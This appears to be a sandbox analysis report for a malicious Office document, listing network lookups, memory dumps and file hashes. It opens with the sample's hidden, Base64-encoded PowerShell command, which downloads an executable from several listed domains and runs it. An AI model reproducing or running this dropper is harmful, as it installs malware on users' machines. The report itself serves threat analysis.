Powershell -w hidden -en JABQAGUAZwB4AGkAagByAGsAdgBwAD0AJwBEAGUAbgBsAGsAdQB3AGQAdQBmAHoAJwA7ACQAUABhAHAAbgBvAHkAZABzAHgAIAA9ACAAJwA1ADEAMQAnADsAJABHAGwAegBpAGEAZwBwAGoAPQAnAEYAZQBkAHIAeQB2AHQAbwBhAG4AJwA7ACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABhAHAAbgBvAHkAZABzAHgAKwAnAC4AZQB4AGUAJwA7ACQAQQBtAHMAeQBiAGMAcgBrAGYAPQAnAEkAYwBmAGsAbgBwAGkAeQAnADsAJABKAG8AawBzAHYAcQB5AHYAeQBtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAGUAbgBUADsAJABKAHUAeABkAHIAaABoAGoAdABpAD0AJwBoAHQAdABwADoALwAvAHQAaABlAGEAdQBzAHQAaQBuAG8AYwBoAHUAawBzAC4AYwBvAG0ALwBwAGUAcgBzAG8AbgBhAGwAXwBhAHIAcgBhAHkALwBrAHYAcgBtAGkAZgAvACoAaAB0AHQAcAA6AC8ALwBzAGEAcgBhAGYAaQBmAGEAbABsAGEAaABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AFUAWAB0AHAATABoAEkALwAqAGgAdAB0AHAAOgAvAC8AZgBhAHUAcwB0AG8AcwBhAHIAbABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAFkAWgBXADAALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZQBqAGEAaABhAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHEAaQB3ADEAdQA5AC8AKgBoAHQAdABwADoALwAvAHYAaQBrAHMAdABvAHIAeQAuAGMAYQAvAGgALwBmADIAYwBnAFIAdgB3AC8AJwAuACIAcwBgAHAAbABJAHQAIgAoACcAKgAnACkAOwAkAEMAZgBnAHEAZQBlAHoAbAA9ACcASQBvAHkAawBtAHAAYwBlAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARAB4AG0AZgB4AHQAYQB1AGUAYwB4AHAAdAAgAGkAbgAgACQASgB1AHgAZAByAGgAaABqAHQAaQApAHsAdAByAHkAewAkAEoAbwBrAHMAdgBxAHkAdgB5AG0ALgAiAEQAbwBgAFcATgBMAG8AQQBkAGYAYABJAGAATABlACIAKAAkAEQAeABtAGYAeAB0AGEAdQBlAGMAeABwAHQALAAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApADsAJABMAGQAdgBvAHMAbABnAHoAcwA9ACcARwB5AGgAbABoAHcAeQByAHkAdQBoACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwAzADkAOAAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEwAdABlAHUAdgBzAHEAbQBiAGwAYQBxAGYAKQA7ACQAVgB4AHgAbQBkAG0AYwBpAD0AJwBEAHYAcQBsAG8AZQBsAHUAdAB4AHIAbQAnADsAYgByAGUAYQBrADsAJABWAGkAbwB6AHUAbQBlAGwAPQAnAFgAbgBqAG4AbwBjAG8AeQBkAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBtAGQAdQBqAG0AeQB3AG0AaQA9ACcAUQB2AHgAYwBvAGoAcABzAHUAZwBvAGEAJwA=

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 theaustinochuks.com udp
US 8.8.8.8:53 sarafifallahi.com udp
US 8.8.8.8:53 faustosarli.com udp
US 104.21.20.20:80 faustosarli.com tcp
US 8.8.8.8:53 www.faustosarli.com udp
US 172.67.190.216:443 www.faustosarli.com tcp
US 8.8.8.8:53 20.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 216.190.67.172.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 janejahan.com udp
US 13.248.169.48:80 janejahan.com tcp
US 8.8.8.8:53 vikstory.ca udp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 92.123.26.217:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.136:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 217.26.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp

Files

memory/4764-1-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-0-0x00007FF87446D000-0x00007FF87446E000-memory.dmp

memory/4764-3-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-2-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-5-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-4-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-8-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-10-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-12-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-13-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-14-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-15-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-16-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-17-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

memory/4764-11-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-9-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-7-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-6-0x00007FF834450000-0x00007FF834460000-memory.dmp

memory/4764-18-0x00007FF8323F0000-0x00007FF832400000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\70F12C09.wmf

MD5 ba78b6a04f23bba2f52269219d1e49d3
SHA1 cbcb8d8bba5f2d6651cda32fe925cfacb21aed6a
SHA256 c605593939ebe703f8829e168f26e084126efdaa5806d849b9a6ce4b6d1d3670
SHA512 1c622f5aaacee45a89d97d46db029ab17a1093b83f675363717975d8306639a0d9c9c4897026e0c7479019c6b41a0ff5e180ab9ba6b945817a86b4ccbe7991c7

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lpaeulnx.qlp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2472-60-0x000002AF7FD80000-0x000002AF7FDA2000-memory.dmp

memory/4764-72-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-73-0x00007FF87446D000-0x00007FF87446E000-memory.dmp

memory/4764-74-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

memory/4764-75-0x00007FF8743D0000-0x00007FF8745C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 2a383cfc727e47795f091ce927ba9495
SHA1 9a02a467edd34be420e3e3bcd9bcb1366b8c8ed0
SHA256 8a063babb8975104a85ae7da360ceeb5114470c9c812a3536fb83a726ebf4328
SHA512 837cd3bde250ffe4f172a371c7f9e4c859627fe703e4c98d2c2429cf713fc72b5fb2466e8dc9868e299a3dd43322bb731d81a536eb550bf1874323915ed8f664

C:\Users\Admin\AppData\Local\Temp\TCD2E3.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810